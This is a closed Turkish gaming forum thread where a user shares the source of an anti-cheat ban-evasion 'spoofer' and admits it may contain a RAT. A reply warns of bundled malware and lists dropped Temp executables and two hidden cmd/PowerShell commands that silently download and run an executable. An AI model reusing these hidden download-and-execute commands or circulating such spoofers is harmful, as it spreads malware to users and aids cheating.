Open Src Spoofer

• Konuyu Başlatan Konuyu Başlatan xdaxad
  • Başlangıç tarihi Başlangıç tarihi
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

xdaxad

Esra şanlı yılmaz
Master Üye
İletişim
azranın ve flexin kullandığı spooferin srcsini bırakıyorum isteyen kullansın içinde rat vb olabilir EMİN DEĞİLİM BAKMADIM içinde derlenmiş halleride var yediğiniz ratların sorumluluğu bende değil spooferi kendim denedim bende çalışmadı bazılarında çalışıyormuş diye duydum arkadan baya bi indirme var bu arada bilginize rat vb çıkabilir
dw:

vt:

aynı anda paylaştıkla iki tane spoofer konusu

ne gerekiyor atmak için bios up/down? format? tpm sb off?

luckyware var haberiniz olsun
@sithra @p4n @Node @Lightning
  • C:\Users\<USER>\AppData\Local\Temp\BK215424.exe

• C:\Users\<USER>\AppData\Local\Temp\BK378185.exe

• C:\Users\<USER>\AppData\Local\Temp\ox_1776813633836.exe

• C:\Windows\system32\cmd.exe /c start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri ' ' -OutFile $env:TEMP\BK215424.exe; Start-Process -FilePath $env:TEMP\BK215424.exe -WindowStyle Hidden }"

• C:\Windows\system32\cmd.exe /c start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri ' ' -OutFile $env:TEMP\BK378185.exe; Start-Process -FilePath $env:TEMP\BK378185.exe -WindowStyle Hidden }"

src içinde bir sürü github indirmesi var ayrıca içinde 2 tane spoofer mi ne var

herşey off bios up felaen yoksa delaylı varsa delaysız driverler felan patlak diye duydum
yakında arkadaşım benim emunun srcsini atacak onu kullanıp oynayabilirsiniz şimdiden iyi oyunlar

src içinde bir sürü github indirmesi var ayrıca içinde 2 tane spoofer mi ne var

herşey off bios up felaen yoksa delaylı varsa delaysız driverler felan patlak diye duydum
indirtiyorsa open src olmuyor ki yine kapali kaynak onlarin srcsi var mi peki?

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Şuanda konuyu görüntüleyen kullanıcılar

Geri
Üst Alt